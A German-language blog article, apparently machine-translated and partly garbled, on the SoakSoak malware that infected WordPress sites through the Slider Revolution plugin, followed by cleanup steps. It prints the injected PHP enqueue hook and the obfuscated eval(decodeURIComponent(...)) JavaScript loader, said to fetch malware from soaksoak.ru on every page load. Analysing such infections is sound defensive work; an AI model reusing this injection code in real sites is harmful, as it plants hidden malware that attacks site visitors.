Neue SoakSoak-Malware infiziert WordPress

Vor einigen Tagen, seit Sucuri, wurde das Auftreten einer neuen Malware namens SoakSoak gemeldet , die Tausende von WordPress-Installationen infiziert. Es kann nicht genau angegeben werden, aber es wird angenommen, dass sich der Angriffsvektor in einer Sicherheitsanfälligkeit befindet, die vor einigen Monaten vom Slider Revolution-Plugin entdeckt wurde .

Wir haben bereits in einem früheren Artikel darüber gesprochen, wie der Autor dieses Plugins einen Sicherheitsfehler korrigiert hat, ohne ihn seinen Kunden mitzuteilen, und er hat ihn nicht einmal im Änderungsverlauf gemeldet. Dies führte dazu, dass Benutzer, die dieses Plugin hatten, es aktualisieren konnten (weil sie eine Benachrichtigung über das Aktualisierungssystem hatten), aber es gibt viele Entwickler, die dieses Plugin als Teil ihrer Designs verwenden und nicht als zusätzliche Komponente des Designs verfügbar sind der Update-Benachrichtigungen und führte zu Hunderten von anfälligen Problemen.

Als Nächstes analysieren wir die SoakSoak-Malware und geben einige Tipps zum Reinigen und Entfernen.

Analyse von SoakSoak Malware in WordPress

Diese Malware ändert die wp-includes/template-loader.php sie den folgenden Code wp-includes/template-loader.php :

 function FuncQueueObject() { wp_enqueue_script("swfobject"); } add_action("wp_enqueue_scripts", 'FuncQueueObject'); 

wp-includes/js/swfobject.js andererseits den folgenden Javascript-Code in die wp-includes/js/swfobject.js :

 eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B")); 

Mit diesen beiden Codes können Sie die Malware jedes Mal von der Seite http://soaksoak.ru herunterladen und ausführen, wenn ein Benutzer eine WordPress-Seite lädt.

Um diese Code-Injektionen durchzuführen, verwenden Hacker eine als Filesman bekannte Backdoor und installieren sogar ein schädliches Design , aktivieren es jedoch nicht.

So säubern Sie SoakSoak-Malware in WordPress.

Die Bereinigung von SoakSoak-Malware ist relativ einfach, da zwei Dateien infiziert werden, die Teil des WordPress-Kerns sind. Die Schritte in zusammengefasster Form wären:

  • Löschen Sie den Ordner ” wp-includes ” und seinen gesamten Inhalt.
  • Extrahieren Sie den Ordner wp-includes aus der neu heruntergeladenen WordPress-Zip-Datei und laden Sie ihn auf unser Webhosting hoch.
  • Überprüfen Sie den Ordner wp-content/themes/ auf schädliche Dateien.
  • Es ist ratsam, das Sucuri-Plugin zu verwenden, um unsere Site zu analysieren. Gehen Sie dann zur Registerkarte “Post-Hack” und verwenden Sie die Funktionalität “Plugins zurücksetzen” .
  • Schließlich müssen wir die Zugriffskennwörter für das WordPress-Administratorfenster ändern, und es wird empfohlen, das Kennwort des SQL-Datenbankbenutzers zu ändern.
See also  HTC U12: beeindruckend und schwer zu schlagen nach diesen Lecks

administrator

Leave a Reply

Your email address will not be published. Required fields are marked *